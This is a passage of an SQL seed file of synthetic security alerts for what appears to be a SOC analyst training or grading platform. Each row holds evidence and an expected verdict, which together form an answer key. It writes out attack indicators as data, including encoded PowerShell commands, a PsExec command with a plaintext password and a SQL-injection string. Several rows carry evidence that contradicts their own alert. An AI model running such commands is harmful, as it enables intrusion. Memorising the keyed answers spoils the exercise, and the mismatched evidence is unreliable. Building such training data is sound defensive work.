6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(690, 'Suspicious Network Connection from Internal System', 'low', 'Firewall', 'A network connection was observed from an internal system to an external IP address. The connection was flagged due to unusual activity patterns.', 'Network Anomaly', 'N/A', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:02:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"workstation-12\"}', '2026-01-10 14:41:41', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The external IP has no malicious activity reports, indicating this is likely benign activity.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(691, 'Ransomware Attack Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected on the network, originating from an external IP address known for malicious activity. The beacon was executed on a compromised internal machine, indicating potential ransomware deployment.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WS-123\",\"command_line\":\"C:\\\\Program Files\\\\Common Files\\\\cs.exe -connect 203.0.113.45:443\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 17:36:25', '2026-02-16 18:05:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting Cobalt Strike C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payloads.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon indicates an active attempt to deploy ransomware, necessitating immediate remediation.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(692, 'Suspicious Login Attempts Detected from Foreign IP', 'high', 'Wazuh', 'Multiple failed login attempts were detected from an IP address located in a region with no known business operations. This could indicate a potential brute force attack.', 'Brute Force', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.77\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER-01\",\"failed_attempts\":25}', '2026-01-09 16:58:08', '2026-02-22 14:26:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP frequently reported for login brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username for brute force attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-SERVER-01\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by brute force attempts.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a suspicious IP address suggest a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(693, 'Phishing Email with Malicious URL Detected', 'medium', 'Proofpoint', 'A phishing email was detected containing a malicious URL intended to harvest user credentials. The email was sent from a spoofed domain mimicking a trusted partner.', 'Phishing', 'T1566', 1, 'investigating', 237, '{\"timestamp\":\"2026-01-11T08:45:20Z\",\"event_type\":\"email_received\",\"email_sender\":\"alerts@trusted-partner.com\",\"username\":\"asmith\",\"malicious_url\":\"http://malicious-url.com/login\"}', '2026-01-09 20:28:49', '2026-03-04 15:58:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trusted-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain appears to be spoofed.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for phishing attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user targeted by phishing attempt.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL and spoofed domain indicate a phishing attempt to steal user credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.340Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(694, 'Failed RDP Access from Known Safe IP', 'low', 'Firewall', 'A failed RDP access attempt was logged from an IP address previously whitelisted for remote connections. The activity appears to be benign.', 'Brute Force', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T12:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"mnguyen\",\"hostname\":\"CORP-RDP-SERVER\",\"failed_attempts\":3}', '2026-01-10 16:12:35', '2026-02-22 14:53:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"IP address is whitelisted for remote access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mnguyen\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User confirmed to have attempted RDP login.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-RDP-SERVER\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"RDP server receiving authorized connection attempts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is whitelisted, indicating the failed login attempts are likely a result of user error rather than malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(695, 'LockBit Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected communicating with a known LockBit ransomware command and control server. The affected machine is showing signs of ransomware infection.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.15.23\",\"dst_ip\":\"185.199.110.153\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKSTN-45\",\"command_line\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 03:14:01', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 1203 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicating potential malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with LockBit ransomware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon and known ransomware file hash confirms the infection.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(696, 'Suspicious RDP Login Attempts Detected', 'high', 'Wazuh', 'Multiple failed RDP login attempts detected from an external IP address. The attempts indicate a potential brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":37}', '2026-01-09 18:53:30', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP suggests a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.343Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:31:22.343Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:30:22.343Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:29:22.343Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:28:22.343Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(697, 'ALPHV Ransomware Reconnaissance Activity Detected', 'medium', 'Splunk', 'Suspicious use of PsExec detected, indicating potential lateral movement associated with ALPHV ransomware.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.12\",\"dst_ip\":\"10.0.0.23\",\"username\":\"svc_admin\",\"hostname\":\"CORP-SERVER-01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\"}', '2026-01-11 13:49:48', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP involved in lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec is commonly used for lateral movement, especially in ransomware operations.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(698, 'False Positive: Legitimate User Activity Mistaken for Command Injection', 'low', 'IDS', 'An alert was triggered for a suspected command injection, but the activity was identified as a legitimate administrative task.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T05:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"ping -c 4 8.8.8.8 && echo test\",\"url\":\"http://192.168.2.20/admin/execute\"}', '2026-01-10 23:39:43', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of internal admin machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Web server internal IP\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"ping -c 4 8.8.8.8 && echo test\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative command executed\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Upon review, the command was identified as a routine administrative task, not malicious.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 